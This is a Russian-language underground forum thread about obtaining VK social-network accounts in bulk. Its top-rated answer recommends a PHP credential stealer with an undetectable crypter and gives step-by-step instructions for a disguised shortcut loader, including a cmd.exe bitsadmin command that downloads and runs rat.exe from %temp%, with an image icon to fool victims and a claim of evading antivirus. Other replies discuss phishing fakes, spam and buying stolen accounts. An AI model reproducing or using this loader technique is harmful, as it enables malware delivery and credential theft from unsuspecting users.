Перейти к содержимому

Купить ссылку здесь
Фотография
- - - - -

Как добывать аккаунты?

Форум ZiSMO.biz

Лучший Ответ Startmos , 29 06 2016 - 07:18

Приветствую форумчани,кто каким образом добывает аккаунты вк? Через стиллер? Кто подробнее можно рассказать об этом? Был бы очень признателен Вам.

Есть щас рабочие стилеры?

Есть хороший PHP стиллер) + фуд криптор и все ок) + незаурядная прокладка + заливаешь на платный файлообменник + 2 профит))) Ссылка

+ можно склеить с чем угодно, PDF JPG PHG и т.д)

Ссылка

Немного убил exe, обычный рекрипт и минимум месяц как новый)))

Ссылка

Ссылка

Ссылка

+ делаешь донвлоудер 

1.Билдим наш ехе что будем подгружать я для примера взял комету
2.Криптуем
3.Заливаем на файлообменник (нам нужен прямой линк) я не стал задрачиватся с обмениками и залил файл на хостинг , тут разницы в принципе нет куда лить главное чтобы ваша ссылка оканчивалась расширением файла Ссылка
4.Создаём ярлык (пкм - создать-ярлык) Screenshot
5.Далее нужно указать расположение объекта сюда мы будем вписывать наш мега код =)
Код:
“C:\Windows\System32\cmd.exe /c bitsadmin /transfer /download /priority HIGH Ссылка%temp%\\rat.exe>nul & start %temp%\\rat.exe”
(Для тех кто в танке код вписываем без КОВЫЧЕК)
Клацаем “далее” Вводим имя файла например rat.lnk жмём готово
6.Такой ярлык не катит делаем его под картинку =) клацаем по файлу ПКМ – свойства –сменить значок в эту строку Screenshot пишем %SystemRoot%\System32\shell32.dll клацаем Enter выбираем значок как у изображения клацаем Ок – Применить
Всё Наш мега лоадер готов, Заливать на вирустотал можно до посинения детектов у него не появится =)
Перейти к сообщению

38
Сообщений в теме: 38

ONLINE Отправлено

ScreaMdaK1ng
группа пользователя
  • Онлайн:3д 18ч 32м
8
Приветствую форумчани,кто каким образом добывает аккаунты вк? Через стиллер? Кто подробнее можно рассказать об этом? Был бы очень признателен Вам.

• 0
  • Наверх
  • Ответить

OFFLINE Отправлено

ganja27
группа пользователя
7
    • 0
  • Наверх
  • Ответить

OFFLINE Отправлено

itruegiraffe
группа пользователя
  • Онлайн:46д 9ч 49м
85

Я сам регаю→продаю

Кто то покупает

• 0
  • Наверх
  • Ответить

OFFLINE Отправлено

Олеся Авдонина
группа пользователя
  • Онлайн:142д 14ч 28м
2 516

Дельные способы продают, поищи, здесь продавался хороший способ за адекватную ценую

• 0
  • Наверх
  • Ответить

OFFLINE Отправлено

_NexuS_
группа пользователя
  • Онлайн:77д 7ч 6м
174

Фейк+спам

• 0
  • Наверх
  • Ответить

OFFLINE Отправлено

_NexuS_
группа пользователя
174

Дельные способы продают, поищи, здесь продавался хороший способ за адекватную ценую

На форуме вроде как запрещено продавать мануалы по обману людей. Не думаю что тут видели)

• 0
  • Наверх
  • Ответить

ONLINE Отправлено

ScreaMdaK1ng
группа пользователя
8

Фейк+спам

Спам чего?) Просто интересно,как люди порой добывают от 1000-2000 аккаунтов в день...
    • 0
  • Наверх
  • Ответить

OFFLINE Отправлено

_NexuS_
группа пользователя
174

Спам чего?) Просто интересно,как люди порой добывают от 1000-2000 аккаунтов в день...

Угадай, чего спам я мог предложить? 
Да, правильно, конечно же спам с ссылкой на свой фейк

• 0
  • Наверх
  • Ответить

OFFLINE Отправлено

Kukim
группа пользователя
-3

Бюджет иметь надо)

• 0
  • Наверх
  • Ответить

OFFLINE Отправлено

Олеся Авдонина
группа пользователя
2 516

На форуме вроде как запрещено продавать мануалы по обману людей. Не думаю что тут видели)

ну скорее всего данный человек покупать не будет, а на халяву вряд ли кто поделится своими способами. 

• 0
  • Наверх
  • Ответить

OFFLINE Отправлено

Олеся Авдонина
группа пользователя
2 516

Вот он точно знает, как и где Ссылка

• 0
  • Наверх
  • Ответить

OFFLINE Отправлено

Zhigan
группа пользователя
  • Онлайн:56д 6ч 25м
61

Что бы иметь такой объем аккаунтов ежедневно, нужно сначала неплохо вложиться. Даже очень неплохо. Если есть финансы то чекни в лс, за копеечку, скажу где, как. Могу научить добывать другими путями.

• 0
  • Наверх
  • Ответить

OFFLINE Отправлено

ПАУК
группа пользователя
78

ВРОДЕ 

• 0
  • Наверх
  • Ответить

ONLINE Отправлено

ScreaMdaK1ng
группа пользователя
8
Кто сказал что я не готов что-то покупать,скиньте проверенные источники,обсудим с ним все)
    • 0
  • Наверх
  • Ответить

OFFLINE Отправлено

zeozao
группа пользователя
  • Онлайн:4д 20ч 50м
1

похоже не все тут понимают, что такое стилер, что такое фейк и тд.

• 0
  • Наверх
  • Ответить

OFFLINE Отправлено   Лучший Ответ

Startmos
группа пользователя
18

Есть хороший PHP стиллер) + фуд криптор и все ок) + незаурядная прокладка + заливаешь на платный файлообменник + 2 профит))) Ссылка

Ссылка

Ссылка

Ссылка

Ссылка

+ делаешь донвлоудер 

2.Криптуем
3.Заливаем на файлообменник (нам нужен прямой линк) я не стал задрачиватся с обмениками и залил файл на хостинг , тут разницы в принципе нет куда лить главное чтобы ваша ссылка оканчивалась расширением файла Ссылка
5.Далее нужно указать расположение объекта сюда мы будем вписывать наш мега код =)
Код:
“C:\Windows\System32\cmd.exe /c bitsadmin /transfer /download /priority HIGH Ссылка%temp%\\rat.exe>nul & start %temp%\\rat.exe”
6.Такой ярлык не катит делаем его под картинку =) клацаем по файлу ПКМ – свойства –сменить значок в эту строку Screenshot пишем %SystemRoot%\System32\shell32.dll клацаем Enter выбираем значок как у изображения клацаем Ок – Применить
Всё Наш мега лоадер готов, Заливать на вирустотал можно до посинения детектов у него не появится =)

Сообщение отредактировал Startmos: 29 06 2016 - 07:44

• 0
  • Наверх
  • Ответить

OFFLINE Отправлено

Ak1mkeee
группа пользователя
9

фейки на популярные темы филльмы сериалы и спам по крупным сообществам 

• 0
  • Наверх
  • Ответить

OFFLINE Отправлено

Хрум Хрумыч
группа пользователя
  • Онлайн:21ч 17м
0

Покупать

• 0
  • Наверх
  • Ответить

OFFLINE Отправлено

ganja27
группа пользователя
7

Есть хороший PHP стиллер) + фуд криптор и все ок) + незаурядная прокладка + заливаешь на платный файлообменник + 2 профит))) Ссылка
Ссылка
Ссылка
Ссылка
Ссылка

+ делаешь донвлоудер
2.Криптуем
Код:

Раньше было проще качаешь прогу ставишь галочки от куда брать полрои логины но увы софт сдох, вот я про совт спрашивал, есть ли?
    • 0
  • Наверх
  • Ответить

OFFLINE Отправлено

Startmos
группа пользователя
18

Раньше было проще качаешь прогу ставишь галочки от куда брать полрои логины но увы софт сдох, вот я про совт спрашивал, есть ли?

Есть конечно, но приватный) такие как UFR и тому подобная шняга уже не катят. У меня на PHP , отлично работает. Иногда бывает очень интересная инфа в логах всплывает) 

• 0
  • Наверх
  • Ответить

Напишите свое сообщение